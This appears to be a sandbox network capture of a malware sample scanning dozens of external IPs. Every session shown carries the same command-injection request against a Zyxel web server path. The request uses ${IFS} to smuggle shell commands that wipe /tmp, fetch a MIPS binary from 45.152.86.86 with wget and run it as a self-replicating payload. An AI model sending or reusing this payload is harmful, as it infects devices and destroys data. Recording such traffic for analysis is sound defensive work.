                              Mar 31, 2024 08:42:16.479593039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9206192.168.2.1340792138.169.49.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479648113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9207192.168.2.135899614.11.189.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479687929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9208192.168.2.134284688.124.118.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479736090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9209192.168.2.1351892222.79.105.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479809046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9210192.168.2.133513092.122.66.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479823112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9211192.168.2.1340942116.80.227.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479893923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9212192.168.2.134964293.28.1.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479918003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9213192.168.2.134495854.100.248.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479964972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9214192.168.2.134374065.224.9.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.479991913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9215192.168.2.135565013.47.144.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480012894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9216192.168.2.1349694111.71.237.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480084896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9217192.168.2.133507213.249.174.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480140924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9218192.168.2.1360072187.95.154.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480171919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9219192.168.2.1357274211.118.209.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480194092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9220192.168.2.135628275.205.103.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480272055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9221192.168.2.1339128174.241.212.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480321884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9222192.168.2.1348496170.159.79.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480386019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9223192.168.2.1346998126.6.201.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480426073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9224192.168.2.1357012181.111.157.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480499983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9225192.168.2.135997699.150.197.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480551958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9226192.168.2.1333120162.96.56.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480592966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9227192.168.2.1354730149.207.243.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480648041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9228192.168.2.135122845.147.25.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480730057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9229192.168.2.1338430103.78.73.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480773926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9230192.168.2.1341348187.143.221.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480823994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9231192.168.2.1354322116.41.49.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480890989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9232192.168.2.135060841.99.90.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.480947971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9233192.168.2.1356586212.158.225.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481003046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9234192.168.2.134428076.109.188.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481029034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9235192.168.2.1336308146.166.120.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481079102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9236192.168.2.1345586216.129.51.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481132984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9237192.168.2.1334164202.143.90.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481183052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9238192.168.2.1354418176.159.28.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481235027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9239192.168.2.1339066137.188.175.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481270075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9240192.168.2.1337192135.10.240.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481328011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9241192.168.2.135588448.117.124.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481381893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9242192.168.2.1352764169.35.164.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481431007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9243192.168.2.1335872211.56.251.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481483936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9244192.168.2.1333626204.125.103.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481513977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9245192.168.2.1347632113.45.144.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481543064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9246192.168.2.135815039.119.169.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.481618881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9247192.168.2.1351678131.193.95.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486172915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9248192.168.2.1350360209.204.98.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486202955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9249192.168.2.13373445.27.69.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486254930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9250192.168.2.135301689.42.242.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486284018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9251192.168.2.1341040169.60.47.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486314058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9252192.168.2.13489608.25.243.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486367941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9253192.168.2.1344918202.229.59.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.486422062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9254192.168.2.134430246.3.37.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.492808104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9255192.168.2.135983835.49.178.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.492847919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9256192.168.2.1356572154.119.211.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.492897034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9257192.168.2.1358690116.94.85.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.492959023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9258192.168.2.135038486.252.30.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493017912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9259192.168.2.1343648106.9.145.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493088961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9260192.168.2.135941062.249.225.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493107080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9261192.168.2.1356638203.206.13.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493172884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9262192.168.2.134087038.201.1.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493227005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9263192.168.2.134435427.196.79.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493300915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9264192.168.2.1358808116.156.81.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493345976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9265192.168.2.134033875.216.78.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493413925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9266192.168.2.1332808103.236.119.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493438959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9267192.168.2.135428889.241.213.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493482113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9268192.168.2.1342086165.13.56.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493558884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9269192.168.2.1334444103.197.213.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493587017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9270192.168.2.133410861.4.126.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493666887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9271192.168.2.1336508136.130.189.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493726969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9272192.168.2.135096063.131.218.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493748903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9273192.168.2.1354530154.188.4.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:17.493798971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9274192.168.2.1359216197.40.108.120443
                              TimestampBytes transferredDirectionData
